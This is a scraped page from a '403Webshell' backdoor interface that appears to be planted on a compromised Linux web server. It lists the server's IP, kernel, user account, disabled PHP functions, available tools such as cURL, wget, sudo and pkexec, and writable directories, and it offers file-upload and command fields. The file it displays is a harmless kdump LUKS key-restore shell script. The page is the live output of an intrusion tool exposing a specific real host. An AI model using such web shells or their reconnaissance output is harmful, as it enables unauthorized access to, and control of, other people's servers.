403Webshell
Server IP : 85.112.90.236  /  Your IP : 192.168.1.26
Web Server : Apache
System : Linux 85-112-90-236.cprapid.com 6.12.0-211.7.3.el10_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 12:46:58 EDT 2026 x86_64
User : ftechme ( 1002)
PHP Version : 8.2.32
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/dracut/modules.d/99kdumpbase/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/dracut/modules.d/99kdumpbase/kexec-crypt-setup.sh
#!/bin/sh
#
LUKS_CONFIGFS_RESTORE=/sys/kernel/config/crash_dm_crypt_keys/restore
RESTORED=1
MAX_WAIT_TIME=10
wait_time=0

while [ $wait_time -lt $MAX_WAIT_TIME ]; do
    [ -e $LUKS_CONFIGFS_RESTORE ] && break
    sleep 1
    wait_time=$((wait_time + 1))
done

if [ $wait_time -ge $MAX_WAIT_TIME ]; then
    echo "$LUKS_CONFIGFS_RESTORE isn't ready after ${MAX_WAIT_TIME}s, something wrong!"
    exit 1
fi

if ! grep -q "$RESTORED" "$LUKS_CONFIGFS_RESTORE"; then
    echo $RESTORED > $LUKS_CONFIGFS_RESTORE
fi

Youez - 2016 - github.com/yon3zu
LinuXploit